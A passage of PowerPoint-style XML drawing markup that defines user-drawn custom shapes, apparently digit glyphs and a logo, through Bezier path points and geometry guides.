                    <a:pt x="0" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="30"/>
                    <a:pt x="10" y="28"/>
                    <a:pt x="15" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="23"/>
                    <a:pt x="26" y="21"/>
                    <a:pt x="31" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="15"/>
                    <a:pt x="42" y="12"/>
                    <a:pt x="47" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="6"/>
                    <a:pt x="55" y="3"/>
                    <a:pt x="59" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="0"/>
                    <a:pt x="67" y="0"/>
                    <a:pt x="67" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6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36"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="639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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6547"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4"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38"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6744"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5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3"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5"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9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6893"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1"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0" y="28"/>
                    <a:pt x="16" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21"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0"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7043" y="1103"/>
              <a:ext cx="83" cy="244"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 68 w 68"/>
                <a:gd name="T1" fmla="*/ 200 h 200"/>
                <a:gd name="T2" fmla="*/ 45 w 68"/>
                <a:gd name="T3" fmla="*/ 200 h 200"/>
                <a:gd name="T4" fmla="*/ 45 w 68"/>
                <a:gd name="T5" fmla="*/ 31 h 200"/>
                <a:gd name="T6" fmla="*/ 38 w 68"/>
                <a:gd name="T7" fmla="*/ 37 h 200"/>
                <a:gd name="T8" fmla="*/ 26 w 68"/>
                <a:gd name="T9" fmla="*/ 43 h 200"/>
                <a:gd name="T10" fmla="*/ 13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4" y="39"/>
                    <a:pt x="31" y="41"/>
                    <a:pt x="26" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="46"/>
                    <a:pt x="18" y="48"/>
                    <a:pt x="13" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="51"/>
                    <a:pt x="4" y="53"/>
                    <a:pt x="0" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="30"/>
                    <a:pt x="10" y="28"/>
                    <a:pt x="16" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="23"/>
                    <a:pt x="26"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41"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7192" y="1103"/>
              <a:ext cx="83" cy="244"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 68 w 68"/>
                <a:gd name="T1" fmla="*/ 200 h 200"/>
                <a:gd name="T2" fmla="*/ 46 w 68"/>
                <a:gd name="T3" fmla="*/ 200 h 200"/>
                <a:gd name="T4" fmla="*/ 46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60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6" y="200"/>
                    <a:pt x="46" y="200"/>
                    <a:pt x="46" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="31"/>
                    <a:pt x="46" y="31"/>
                    <a:pt x="46" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="32"/>
                    <a:pt x="42" y="34"/>
                    <a:pt x="38" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="39"/>
                    <a:pt x="31" y="41"/>
                    <a:pt x="27" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="46"/>
                    <a:pt x="18" y="48"/>
                    <a:pt x="14" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="51"/>
                    <a:pt x="5" y="53"/>
                    <a:pt x="0" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="30"/>
                    <a:pt x="11" y="28"/>
                    <a:pt x="16" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="23"/>
                    <a:pt x="27" y="21"/>
                    <a:pt x="32" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="15"/>
                    <a:pt x="43" y="12"/>
                    <a:pt x="47" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="6"/>
                    <a:pt x="56" y="3"/>
                    <a:pt x="60"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42"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7340" y="1104"/>
              <a:ext cx="156" cy="248"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 128 w 128"/>
                <a:gd name="T1" fmla="*/ 100 h 203"/>
                <a:gd name="T2" fmla="*/ 123 w 128"/>
                <a:gd name="T3" fmla="*/ 144 h 203"/>
                <a:gd name="T4" fmla="*/ 110 w 128"/>
                <a:gd name="T5" fmla="*/ 176 h 203"/>
                <a:gd name="T6" fmla="*/ 90 w 128"/>
                <a:gd name="T7" fmla="*/ 196 h 203"/>
                <a:gd name="T8" fmla="*/ 62 w 128"/>
                <a:gd name="T9" fmla="*/ 203 h 203"/>
                <a:gd name="T10" fmla="*/ 36 w 128"/>
                <a:gd name="T11" fmla="*/ 196 h 203"/>
                <a:gd name="T12" fmla="*/ 16 w 128"/>
                <a:gd name="T13" fmla="*/ 177 h 203"/>
                <a:gd name="T14" fmla="*/ 4 w 128"/>
                <a:gd name="T15" fmla="*/ 147 h 203"/>
                <a:gd name="T16" fmla="*/ 0 w 128"/>
                <a:gd name="T17" fmla="*/ 105 h 203"/>
                <a:gd name="T18" fmla="*/ 4 w 128"/>
                <a:gd name="T19" fmla="*/ 60 h 203"/>
                <a:gd name="T20" fmla="*/ 17 w 128"/>
                <a:gd name="T21" fmla="*/ 27 h 203"/>
                <a:gd name="T22" fmla="*/ 38 w 128"/>
                <a:gd name="T23" fmla="*/ 7 h 203"/>
                <a:gd name="T24" fmla="*/ 66 w 128"/>
                <a:gd name="T25" fmla="*/ 0 h 203"/>
                <a:gd name="T26" fmla="*/ 128 w 128"/>
                <a:gd name="T27" fmla="*/ 100 h 203"/>
                <a:gd name="T28" fmla="*/ 105 w 128"/>
                <a:gd name="T29" fmla="*/ 102 h 203"/>
                <a:gd name="T30" fmla="*/ 65 w 128"/>
                <a:gd name="T31" fmla="*/ 19 h 203"/>
                <a:gd name="T32" fmla="*/ 23 w 128"/>
                <a:gd name="T33" fmla="*/ 104 h 203"/>
                <a:gd name="T34" fmla="*/ 64 w 128"/>
                <a:gd name="T35" fmla="*/ 183 h 203"/>
                <a:gd name="T36" fmla="*/ 105 w 128"/>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203">
                  <a:moveTo>
                    <a:pt x="128" y="100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="117"/>
                    <a:pt x="126" y="131"/>
                    <a:pt x="123" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="157"/>
                    <a:pt x="116" y="167"/>
                    <a:pt x="110" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="185"/>
                    <a:pt x="98" y="191"/>
                    <a:pt x="90" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="200"/>
                    <a:pt x="72" y="203"/>
                    <a:pt x="62" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="203"/>
                    <a:pt x="43" y="200"/>
                    <a:pt x="36"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3" y="18"/>
                    <a:pt x="29" y="11"/>
                    <a:pt x="38" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="2"/>
                    <a:pt x="55" y="0"/>
                    <a:pt x="66" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="0"/>
                    <a:pt x="128" y="33"/>
                    <a:pt x="128" y="100"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="105" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="47"/>
                    <a:pt x="91" y="19"/>
                    <a:pt x="65" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="19"/>
                    <a:pt x="23" y="47"/>
                    <a:pt x="23" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="157"/>
                    <a:pt x="37" y="183"/>
                    <a:pt x="64" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="183"/>
                    <a:pt x="105" y="156"/>
                    <a:pt x="10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443"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7538" y="1103"/>
              <a:ext cx="83" cy="244"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 68 w 68"/>
                <a:gd name="T1" fmla="*/ 200 h 200"/>
                <a:gd name="T2" fmla="*/ 45 w 68"/>
                <a:gd name="T3" fmla="*/ 200 h 200"/>
                <a:gd name="T4" fmla="*/ 45 w 68"/>
                <a:gd name="T5" fmla="*/ 31 h 200"/>
                <a:gd name="T6" fmla="*/ 38 w 68"/>
                <a:gd name="T7" fmla="*/ 37 h 200"/>
                <a:gd name="T8" fmla="*/ 27 w 68"/>
                <a:gd name="T9" fmla="*/ 43 h 200"/>
                <a:gd name="T10" fmla="*/ 14 w 68"/>
                <a:gd name="T11" fmla="*/ 49 h 200"/>
                <a:gd name="T12" fmla="*/ 0 w 68"/>
                <a:gd name="T13" fmla="*/ 54 h 200"/>
                <a:gd name="T14" fmla="*/ 0 w 68"/>
                <a:gd name="T15" fmla="*/ 31 h 200"/>
                <a:gd name="T16" fmla="*/ 16 w 68"/>
                <a:gd name="T17" fmla="*/ 26 h 200"/>
                <a:gd name="T18" fmla="*/ 32 w 68"/>
                <a:gd name="T19" fmla="*/ 18 h 200"/>
                <a:gd name="T20" fmla="*/ 47 w 68"/>
                <a:gd name="T21" fmla="*/ 9 h 200"/>
                <a:gd name="T22" fmla="*/ 59 w 68"/>
                <a:gd name="T23" fmla="*/ 0 h 200"/>
                <a:gd name="T24" fmla="*/ 68 w 68"/>
                <a:gd name="T25" fmla="*/ 0 h 200"/>
                <a:gd name="T26" fmla="*/ 68 w 68"/>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200">
                  <a:moveTo>
                    <a:pt x="68" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="200"/>
                    <a:pt x="45" y="200"/>
                    <a:pt x="45" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="31"/>
                    <a:pt x="45" y="31"/>
                    <a:pt x="45" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="32"/>
                    <a:pt x="41" y="34"/>
                    <a:pt x="38" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="39"/>
                    <a:pt x="31" y="41"/>
                    <a:pt x="27" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="46"/>
                    <a:pt x="18" y="48"/>
                    <a:pt x="14" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="51"/>
                    <a:pt x="4" y="53"/>
                    <a:pt x="0" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="30"/>
                    <a:pt x="10" y="28"/>
                    <a:pt x="16" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="23"/>
                    <a:pt x="27" y="21"/>
                    <a:pt x="32" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="15"/>
                    <a:pt x="42" y="12"/>
                    <a:pt x="47" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="6"/>
                    <a:pt x="56" y="3"/>
                    <a:pt x="59" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="0"/>
                    <a:pt x="68" y="0"/>
                    <a:pt x="68" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68"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444"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7686" y="1104"/>
              <a:ext cx="155" cy="248"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 127 w 127"/>
                <a:gd name="T1" fmla="*/ 100 h 203"/>
                <a:gd name="T2" fmla="*/ 123 w 127"/>
                <a:gd name="T3" fmla="*/ 144 h 203"/>
                <a:gd name="T4" fmla="*/ 110 w 127"/>
                <a:gd name="T5" fmla="*/ 176 h 203"/>
                <a:gd name="T6" fmla="*/ 89 w 127"/>
                <a:gd name="T7" fmla="*/ 196 h 203"/>
                <a:gd name="T8" fmla="*/ 62 w 127"/>
                <a:gd name="T9" fmla="*/ 203 h 203"/>
                <a:gd name="T10" fmla="*/ 35 w 127"/>
                <a:gd name="T11" fmla="*/ 196 h 203"/>
                <a:gd name="T12" fmla="*/ 16 w 127"/>
                <a:gd name="T13" fmla="*/ 177 h 203"/>
                <a:gd name="T14" fmla="*/ 4 w 127"/>
                <a:gd name="T15" fmla="*/ 147 h 203"/>
                <a:gd name="T16" fmla="*/ 0 w 127"/>
                <a:gd name="T17" fmla="*/ 105 h 203"/>
                <a:gd name="T18" fmla="*/ 4 w 127"/>
                <a:gd name="T19" fmla="*/ 60 h 203"/>
                <a:gd name="T20" fmla="*/ 17 w 127"/>
                <a:gd name="T21" fmla="*/ 27 h 203"/>
                <a:gd name="T22" fmla="*/ 37 w 127"/>
                <a:gd name="T23" fmla="*/ 7 h 203"/>
                <a:gd name="T24" fmla="*/ 66 w 127"/>
                <a:gd name="T25" fmla="*/ 0 h 203"/>
                <a:gd name="T26" fmla="*/ 127 w 127"/>
                <a:gd name="T27" fmla="*/ 100 h 203"/>
                <a:gd name="T28" fmla="*/ 104 w 127"/>
                <a:gd name="T29" fmla="*/ 102 h 203"/>
                <a:gd name="T30" fmla="*/ 65 w 127"/>
                <a:gd name="T31" fmla="*/ 19 h 203"/>
                <a:gd name="T32" fmla="*/ 23 w 127"/>
                <a:gd name="T33" fmla="*/ 104 h 203"/>
                <a:gd name="T34" fmla="*/ 64 w 127"/>
                <a:gd name="T35" fmla="*/ 183 h 203"/>
                <a:gd name="T36" fmla="*/ 104 w 127"/>
                <a:gd name="T37" fmla="*/ 10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203">
                  <a:moveTo>
                    <a:pt x="127" y="100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="117"/>
                    <a:pt x="126" y="131"/>
                    <a:pt x="123" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="157"/>
                    <a:pt x="116" y="167"/>
                    <a:pt x="110" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="185"/>
                    <a:pt x="98" y="191"/>
                    <a:pt x="89" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="200"/>
                    <a:pt x="72" y="203"/>
                    <a:pt x="62" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="203"/>
                    <a:pt x="43" y="200"/>
                    <a:pt x="35" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="192"/>
                    <a:pt x="21" y="185"/>
                    <a:pt x="16" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="169"/>
                    <a:pt x="7" y="159"/>
                    <a:pt x="4" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="134"/>
                    <a:pt x="0" y="121"/>
                    <a:pt x="0" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="88"/>
                    <a:pt x="1" y="73"/>
                    <a:pt x="4" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="47"/>
                    <a:pt x="11" y="36"/>
                    <a:pt x="17" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="18"/>
                    <a:pt x="29" y="11"/>
                    <a:pt x="37" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="2"/>
                    <a:pt x="55" y="0"/>
                    <a:pt x="66" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="0"/>
                    <a:pt x="127" y="33"/>
                    <a:pt x="127" y="100"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="104" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="47"/>
                    <a:pt x="91" y="19"/>
                    <a:pt x="65" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="19"/>
                    <a:pt x="23" y="47"/>
                    <a:pt x="23" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="157"/>
                    <a:pt x="36" y="183"/>
                    <a:pt x="64" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="183"/>
                    <a:pt x="104" y="156"/>
                    <a:pt x="10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445"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5672" y="1096"/>
              <a:ext cx="218" cy="255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 175 w 179"/>
                <a:gd name="T1" fmla="*/ 173 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 179"/>
                <a:gd name="T3" fmla="*/ 208 h 209"/>
                <a:gd name="T4" fmla="*/ 81 w 179"/>
                <a:gd name="T5" fmla="*/ 198 h 209"/>
                <a:gd name="T6" fmla="*/ 32 w 179"/>
                <a:gd name="T7" fmla="*/ 201 h 209"/>
                <a:gd name="T8" fmla="*/ 2 w 179"/>
                <a:gd name="T9" fmla="*/ 184 h 209"/>
                <a:gd name="T10" fmla="*/ 14 w 179"/>
                <a:gd name="T11" fmla="*/ 159 h 209"/>
                <a:gd name="T12" fmla="*/ 9 w 179"/>
                <a:gd name="T13" fmla="*/ 162 h 209"/>
                <a:gd name="T14" fmla="*/ 6 w 179"/>
                <a:gd name="T15" fmla="*/ 183 h 209"/>
                <a:gd name="T16" fmla="*/ 45 w 179"/>
                <a:gd name="T17" fmla="*/ 202 h 209"/>
                <a:gd name="T18" fmla="*/ 42 w 179"/>
                <a:gd name="T19" fmla="*/ 152 h 209"/>
                <a:gd name="T20" fmla="*/ 25 w 179"/>
                <a:gd name="T21" fmla="*/ 133 h 209"/>
                <a:gd name="T22" fmla="*/ 52 w 179"/>
                <a:gd name="T23" fmla="*/ 83 h 209"/>
                <a:gd name="T24" fmla="*/ 58 w 179"/>
                <a:gd name="T25" fmla="*/ 27 h 209"/>
                <a:gd name="T26" fmla="*/ 117 w 179"/>
                <a:gd name="T27" fmla="*/ 17 h 209"/>
                <a:gd name="T28" fmla="*/ 159 w 179"/>
                <a:gd name="T29" fmla="*/ 128 h 209"/>
                <a:gd name="T30" fmla="*/ 153 w 179"/>
                <a:gd name="T31" fmla="*/ 152 h 209"/>
                <a:gd name="T32" fmla="*/ 128 w 179"/>
                <a:gd name="T33" fmla="*/ 150 h 209"/>
                <a:gd name="T34" fmla="*/ 122 w 179"/>
                <a:gd name="T35" fmla="*/ 186 h 209"/>
                <a:gd name="T36" fmla="*/ 165 w 179"/>
                <a:gd name="T37" fmla="*/ 186 h 209"/>
                <a:gd name="T38" fmla="*/ 171 w 179"/>
                <a:gd name="T39" fmla="*/ 173 h 209"/>
                <a:gd name="T40" fmla="*/ 161 w 179"/>
                <a:gd name="T41" fmla="*/ 152 h 209"/>
                <a:gd name="T42" fmla="*/ 88 w 179"/>
                <a:gd name="T43" fmla="*/ 71 h 209"/>
                <a:gd name="T44" fmla="*/ 102 w 179"/>
                <a:gd name="T45" fmla="*/ 67 h 209"/>
                <a:gd name="T46" fmla="*/ 73 w 179"/>
                <a:gd name="T47" fmla="*/ 79 h 209"/>
                <a:gd name="T48" fmla="*/ 63 w 179"/>
                <a:gd name="T49" fmla="*/ 76 h 209"/>
                <a:gd name="T50" fmla="*/ 56 w 179"/>
                <a:gd name="T51" fmla="*/ 100 h 209"/>
                <a:gd name="T52" fmla="*/ 45 w 179"/>
                <a:gd name="T53" fmla="*/ 140 h 209"/>
                <a:gd name="T54" fmla="*/ 38 w 179"/>
                <a:gd name="T55" fmla="*/ 121 h 209"/>
                <a:gd name="T56" fmla="*/ 40 w 179"/>
                <a:gd name="T57" fmla="*/ 142 h 209"/>
                <a:gd name="T58" fmla="*/ 64 w 179"/>
                <a:gd name="T59" fmla="*/ 177 h 209"/>
                <a:gd name="T60" fmla="*/ 70 w 179"/>
                <a:gd name="T61" fmla="*/ 197 h 209"/>
                <a:gd name="T62" fmla="*/ 68 w 179"/>
                <a:gd name="T63" fmla="*/ 182 h 209"/>
                <a:gd name="T64" fmla="*/ 109 w 179"/>
                <a:gd name="T65" fmla="*/ 179 h 209"/>
                <a:gd name="T66" fmla="*/ 115 w 179"/>
                <a:gd name="T67" fmla="*/ 185 h 209"/>
                <a:gd name="T68" fmla="*/ 119 w 179"/>
                <a:gd name="T69" fmla="*/ 171 h 209"/>
                <a:gd name="T70" fmla="*/ 126 w 179"/>
                <a:gd name="T71" fmla="*/ 145 h 209"/>
                <a:gd name="T72" fmla="*/ 126 w 179"/>
                <a:gd name="T73" fmla="*/ 91 h 209"/>
                <a:gd name="T74" fmla="*/ 128 w 179"/>
                <a:gd name="T75" fmla="*/ 134 h 209"/>
                <a:gd name="T76" fmla="*/ 117 w 179"/>
                <a:gd name="T77" fmla="*/ 93 h 209"/>
                <a:gd name="T78" fmla="*/ 104 w 179"/>
                <a:gd name="T79" fmla="*/ 53 h 209"/>
                <a:gd name="T80" fmla="*/ 98 w 179"/>
                <a:gd name="T81" fmla="*/ 36 h 209"/>
                <a:gd name="T82" fmla="*/ 107 w 179"/>
                <a:gd name="T83" fmla="*/ 48 h 209"/>
                <a:gd name="T84" fmla="*/ 87 w 179"/>
                <a:gd name="T85" fmla="*/ 42 h 209"/>
                <a:gd name="T86" fmla="*/ 78 w 179"/>
                <a:gd name="T87" fmla="*/ 44 h 209"/>
                <a:gd name="T88" fmla="*/ 66 w 179"/>
                <a:gd name="T89" fmla="*/ 34 h 209"/>
                <a:gd name="T90" fmla="*/ 67 w 179"/>
                <a:gd name="T91" fmla="*/ 47 h 209"/>
                <a:gd name="T92" fmla="*/ 73 w 179"/>
                <a:gd name="T93" fmla="*/ 48 h 209"/>
                <a:gd name="T94" fmla="*/ 65 w 179"/>
                <a:gd name="T95" fmla="*/ 59 h 209"/>
                <a:gd name="T96" fmla="*/ 101 w 179"/>
                <a:gd name="T97" fmla="*/ 58 h 209"/>
                <a:gd name="T98" fmla="*/ 86 w 179"/>
                <a:gd name="T99" fmla="*/ 67 h 209"/>
                <a:gd name="T100" fmla="*/ 72 w 179"/>
                <a:gd name="T101" fmla="*/ 40 h 209"/>
                <a:gd name="T102" fmla="*/ 73 w 179"/>
                <a:gd name="T103" fmla="*/ 45 h 209"/>
                <a:gd name="T104" fmla="*/ 99 w 179"/>
                <a:gd name="T105" fmla="*/ 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 h="209">
                  <a:moveTo>
                    <a:pt x="161" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="155"/>
                    <a:pt x="162" y="158"/>
                    <a:pt x="163" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="165"/>
                    <a:pt x="167" y="168"/>
                    <a:pt x="170" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="171"/>
                    <a:pt x="174" y="172"/>
                    <a:pt x="175" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="176"/>
                    <a:pt x="179" y="179"/>
                    <a:pt x="176" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="185"/>
                    <a:pt x="170" y="187"/>
                    <a:pt x="166" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="193"/>
                    <a:pt x="148" y="199"/>
                    <a:pt x="141" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="207"/>
                    <a:pt x="137" y="208"/>
                    <a:pt x="134" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="209"/>
                    <a:pt x="128" y="208"/>
                    <a:pt x="125" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="207"/>
                    <a:pt x="119" y="205"/>
                    <a:pt x="118" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="199"/>
                    <a:pt x="113" y="198"/>
                    <a:pt x="110" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="198"/>
                    <a:pt x="90" y="198"/>
                    <a:pt x="81" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="198"/>
                    <a:pt x="72" y="199"/>
                    <a:pt x="68" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="202"/>
                    <a:pt x="64" y="203"/>
                    <a:pt x="63" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="208"/>
                    <a:pt x="54" y="209"/>
                    <a:pt x="48" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="205"/>
                    <a:pt x="38" y="203"/>
                    <a:pt x="32" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="200"/>
                    <a:pt x="18" y="198"/>
                    <a:pt x="11" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="196"/>
                    <a:pt x="7" y="196"/>
                    <a:pt x="5" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="193"/>
                    <a:pt x="0" y="191"/>
                    <a:pt x="1" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="186"/>
                    <a:pt x="2" y="185"/>
                    <a:pt x="2" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="180"/>
                    <a:pt x="4" y="176"/>
                    <a:pt x="3" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="170"/>
                    <a:pt x="2" y="168"/>
                    <a:pt x="2" y="166"/>
                  </a:cubicBezTo>
